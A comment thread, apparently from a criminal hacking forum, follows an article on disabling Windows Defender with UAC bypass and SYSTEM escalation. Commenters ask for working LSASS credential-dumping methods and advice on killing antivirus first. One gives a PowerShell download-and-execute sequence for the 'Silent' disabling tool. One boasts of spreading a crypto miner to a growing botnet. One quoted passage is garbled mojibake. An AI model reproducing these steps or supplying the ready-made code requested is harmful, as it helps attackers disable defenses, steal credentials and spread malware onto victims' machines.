Статья Отключаем Windows Defender (+ UAC Bypass, + Повышение до уровня SYSTEM)

[ioioio777]

Compile the c file directly and run this, right? slient also needs to be run, right?

1) Compile with C#
2) Silent is the same as first project, but already compilated and has "invisible mode" for attacking

 

[ioioio777]

Прошу написать статью о методах дампа lsass с последующим извлечением оттуда кредов.
MirrorDump, Nanodump - как пример, хотелось бы видеть рабочие варианты, примеры из практики. Спасибо.

На данный момент изучаю пентест. Пока ещё на очень поверхностном уровне.
В lsass интересно будет самому углубиться, поэтому ничего не обещаю, но такая статья возможно увидит свет.

Либо одна большая статья со сборкой всех актуальных методов сбора Кредов

 

[KasperWAF]

Прошу написать статью о методах дампа lsass с последующим извлечением оттуда кредов.
MirrorDump, Nanodump - как пример, хотелось бы видеть рабочие варианты, примеры из практики. Спасибо.

Вставлю свои 5 копеек, исходя из практики, дампить лсасс при включенном хорошем авере бессмысленно. Sentinel, Cortex XDR, Sophos при определённых настройках и т.д не дадут ничего сделать даже в случае загрузки ссп плагина. Сначала тебе нужно вынести/приостановить авер, а потом снимать лсасс.

 

[uteus]

What does Silent do

 

[ioioio777]

What does Silent do

disabling Defender XD

before asking you can just check it by yourself

 

[uteus]

just click it right when disable wd work

 

[Quake3]

Майки ответили, что она не на столько критична, чтобы её исправлять.

Майки не считают это уязвимостью, ибо пользователь сам дурак, если работает от админа. Уязвимость это выход с low il, ну либо запуск от админа с учетки обычного юзера.

А так, статья хорошая.

у многих возникают проблемы с обходом дефендера, а я говорил, мол я хз, у меня нет с ним никаких проблем. А тут еще и выясняется, что его можно вырубить тремя техниками из mitre attack и понижением уровня целостности. В целом забавно, аверы - такие аверы.

Уже говорил, и повторюсь: одно дело обойти как РоС, а второе - масс малварь.

 

[KasperWAF]

ÐÐ°Ð¼Ð¿Ñ LSASS Ð´Ð»Ñ Ð²ÑеÑ, даÑом, и пÑÑÑÑ Ð½Ð¸ÐºÑо не ÑÐ¹Ð´ÐµÑ Ð¾Ð±Ð¸Ð¶ÐµÐ½Ð½Ñй

ÐдÑавÑÑвÑйÑе, ÑабÑолÑди! ÐÐµÐ½Ñ Ð·Ð¾Ð²ÑÑ @snovvcrash , и Ñ ÑабоÑÐ°Ñ Ð² оÑделе анализа заÑиÑенноÑÑи компании Angara Security. ÐÑвеÑÐ°Ñ Ñ, знаÑиÑÑÑ, за инÑÑаÑÑÑÑкÑÑÑнÑй пенÑеÑÑ, и в ÑÑой ÑÑаÑÑе Ñ ÑоÑел бÑ...

habr.com

В этой статье используют различные инструменты, которые "обходят" защиту АВ. Может кому-то будет полезно, но я так-же хочу увидеть готовые решения в какой нибудь статье про lsass =)
Ну или варианты "убийства" АВ, дабы потом спокойно сдампить lsass.

Сейфбут

 

[KasperWAF]

Кстати, дефендер можно с корнями удалить из системы при помощи того же гмера. Было бы интересно увидеть тесты на более серьезных ав продуктах.

 

[Gangster_Vegas]

Хорошая статья, мой голос за тебя!!!



Если я хочу выключить конкретный токен - как это сделать?

 

[ioioio777]

Хорошая статья, мой голос за тебя!!!



Если я хочу выключить конкретный токен - как это сделать?

Спасибо большое.
Поштучно выключить токены можно через AdjustTokenPrivileges(), из того же winapi

Только обязательно (!) не выключай их, а полностью выпиливай через SE_PRIVILEGE_REMOVED
Токены с припиской "Default Enabled" - не выключаются, только удаление

 

[Ksandrwarf]

Спасибо за статью.
Просьба есть. Можно ли silent.exe сделать в виде повершелл команды?
Очень надо )

 

[elegant]

Спасибо за статью, потестим. Мой голос однозначно за тебя

 

[ioioio777]

Спасибо за статью.
Просьба есть. Можно ли silent.exe сделать в виде повершелл команды?
Очень надо )

Извини, с ПШ почти не знаком, не смогу тут помочь.

Но слушай, не можешь просто через Invoke-WebRequest -Uri сделать загрузку ?
Хости файл где-то у себя и через ПШ грузи на машину

 

[Ksandrwarf]

Тс в личке подсказал вот так сделать, за что спасибо ему

сначала “(new-object System.Net.WebClient).DownloadFile(‘твоя прямая ссылка’,’C:\Program Files\Installer.exe’)”
потом Set-Location -Path "C:\Program Files\"
потом dir
и если в списке файлов есть Installer.exe - то всё скачалось правильно
просто вводишь команду ./Installer.exe

Но у меня файл не хочет закачиваться почему то. В чем трабл ?

 

[ioioio777]

Только сейчас посмотрел, как выглядит моя статья с оригинальной (светлой) темы форума.
Всем советую прочтение с использованием тёмной темы
Оформление делалось с опорой на неё

 

[build_ext]

Great read, I have been bypassing Defender but with many problems when spreading my crypto miner. I have a good sized bot and it is growing still.

 

[PR1SM-NSA]

Просьба есть. Можно ли silent.exe сделать в виде повершелл команды?

Не получится. PS не обладает таким функционалом.

Автору за статью спасибо, познавательно и очень понятно.

 

[DildoFagins]

Не получится. PS не обладает таким функционалом.

Не обладает каким функционалом? В крайнем случае Add-Type - вперед и с песней.

 

[Ksandrwarf]

Не обладает каким функционалом? В крайнем случае Add-Type - вперед и с песней.

А можно для тех кто не умеет- готовый код подогнать ?))